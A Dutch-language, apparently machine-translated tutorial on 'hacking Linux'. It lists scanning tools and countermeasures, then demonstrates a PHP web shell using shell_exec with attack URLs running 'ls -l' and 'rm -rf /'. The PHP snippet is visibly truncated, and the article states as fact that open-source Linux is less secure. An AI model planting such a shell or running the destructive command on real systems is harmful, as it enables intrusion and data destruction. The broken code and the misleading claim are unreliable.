Linux is het meest gebruikte serverbesturingssysteem, vooral voor webservers. Het is open source; dit betekent dat iedereen toegang heeft tot de broncode. Dit maakt het minder veilig in vergelijking met andere besturingssystemen, omdat aanvallers de broncode kunnen bestuderen om kwetsbaarheden te vinden . Linux for Hackers gaat over het misbruiken van deze kwetsbaarheden om ongeautoriseerde toegang tot een systeem te krijgen.
In dit artikel laten we je kennismaken met wat Linux is, de kwetsbaarheden in de beveiliging, het hacken met Ubuntu en de tegenmaatregelen die je kunt nemen.
Onderwerpen die in deze tutorial worden behandeld
- Snelle opmerking over Linux
- Hulpprogramma's voor het hacken van Linux
- Hoe Linux-hacks te voorkomen
- Hacking-activiteit: Hack een Linux-systeem met behulp van PHP
Snelle opmerking over Linux
Linux is een open source besturingssysteem . Er zijn veel distributies van op Linux gebaseerde besturingssystemen zoals Redhat, Fedora en Ubuntu, enz. In tegenstelling tot andere besturingssystemen is Linux minder veilig als het om beveiliging gaat. Dit komt doordat de broncode vrij beschikbaar is, dus het is gemakkelijk om deze te onderzoeken op kwetsbaarheden en deze te exploiteren in vergelijking met andere besturingssystemen die niet open source zijn. Linux kan worden gebruikt als besturingssysteem voor een server, desktop, tablet of mobiel apparaat.
Linux-programma's kunnen worden bediend met behulp van GUI of opdrachten. De Linux-opdrachten voor het hacken van Kali Linux zijn effectiever en efficiënter in vergelijking met het gebruik van de GUI. Om deze reden helpt het om basis Linux-commando's voor hacken te kennen.
Raadpleeg deze tutorials https://www.guru99.com/unix-linux-tutorial.html om aan de slag te gaan met Kali Linux-hacks.
Hulpprogramma's voor het hacken van Linux
- Nessus - deze tool kan worden gebruikt voor Ubuntu-hack, scanconfiguratie-instellingen, patches en netwerken enz. Het is te vinden op https://www.tenable.com/products/nessus
- NMap. Deze tool kan worden gebruikt om hosts te monitoren die op de server draaien en de services die ze gebruiken. Het kan ook worden gebruikt om naar poorten te scannen. Het is te vinden op https://nmap.org/
- SARA - SARA staat voor Security Auditor's Research Assistant. Zoals de naam al aangeeft, kan deze tool worden gebruikt om netwerken te controleren op bedreigingen zoals SQL Injection, XSS enz. Hij is te vinden op http://www-arc.com/sara/sara.html
De bovenstaande lijst is niet uitputtend; het geeft je een idee van de tools die beschikbaar zijn voor het hacken en hacken van Linux-systemen door Ubuntu.
Hoe Linux-hacks te voorkomen
Linux Hacking maakt gebruik van de kwetsbaarheden in het besturingssysteem. Een organisatie kan het volgende beleid hanteren om zichzelf tegen dergelijke aanvallen te beschermen.
- Patchbeheer - patches repareren bugs die aanvallers misbruiken om een systeem in gevaar te brengen. Een goed patchbeheerbeleid zorgt ervoor dat u constant relevante patches op uw systeem toepast.
- Juiste OS-configuratie - andere exploits profiteren van de zwakke punten in de configuratie van de server. Inactieve gebruikersnamen en daemons moeten worden uitgeschakeld. Standaardinstellingen zoals algemene wachtwoorden voor applicaties, standaardgebruikersnamen en sommige poortnummers moeten worden gewijzigd.
- Inbraakdetectiesysteem - dergelijke tools kunnen worden gebruikt om ongeautoriseerde toegang tot het systeem te detecteren. Sommige tools kunnen dergelijke aanvallen detecteren en voorkomen.
Hacking-activiteit: hack een Ubuntu Linux-systeem met behulp van PHP
In dit praktische scenario zullen we leren hacken met Ubuntu en zullen we u basisinformatie geven over hoe u PHP kunt gebruiken om een Linux te compromitteren. We gaan ons niet op een slachtoffer richten. Als u het wilt uitproberen, kunt u LAMPP op uw lokale computer installeren.
PHP wordt geleverd met twee functies die kunnen worden gebruikt om Linux-hackopdrachten uit te voeren. Het heeft exec () en shell_exec () functies. De functie exec () retourneert de laatste regel van de opdrachtuitvoer terwijl shell_exec () het hele resultaat van de opdracht als een tekenreeks retourneert.
Laten we voor demonstratiedoeleinden aannemen dat de beheerders van de aanvaller het volgende bestand naar een webserver uploaden.
$cmd";$output = shell_exec($cmd);echo "$output";?>
HIER,
Het bovenstaande script haalt de opdracht op van de GET-variabele met de naam cmd. De opdracht wordt uitgevoerd met shell_exec () en de resultaten worden geretourneerd in de browser.
De bovenstaande code kan worden misbruikt door de volgende URL te gebruiken
http: //localhost/cp/konsole.php? cmd = ls% 20-l
HIER,
- "… Konsole.php? Cmd = ls% 20-l" wijst de waarde ls -l toe aan de variabele cmd .
Het commando in Ubuntu voor het hacken van de server wordt uitgevoerd als
shell_exec('ls -l') ;
Het uitvoeren van de bovenstaande code op een webserver geeft resultaten die lijken op de volgende.
De bovenstaande opdracht geeft eenvoudig de bestanden in de huidige map en de rechten weer
Stel dat de aanvaller het volgende commando doorgeeft
rm -rf /
HIER,
- "Rm" verwijdert de bestanden
- “Rf” zorgt ervoor dat de opdracht rm in een recursieve modus wordt uitgevoerd. Alle mappen en bestanden verwijderen
- "/" Instrueert de opdracht om te beginnen met het verwijderen van bestanden uit de hoofdmap
De aanvals-URL zou er ongeveer zo uitzien
http: //localhost/cp/konsole.php? cmd = rm% 20-rf% 20 /
Overzicht
- Linux is een populair besturingssysteem voor servers, desktops, tablets en mobiele apparaten.
- Linux is open source en de broncode kan door iedereen worden verkregen. Hierdoor zijn de kwetsbaarheden gemakkelijk te herkennen. Het is een van de beste besturingssystemen voor hackers.
- Basis- en netwerkhackopdrachten in Ubuntu zijn waardevol voor Linux-hackers.
- Kwetsbaarheden zijn een zwakte die kan worden uitgebuit om een systeem in gevaar te brengen.
- Een goede beveiliging kan helpen om een systeem te beschermen tegen inbraak door een aanvaller.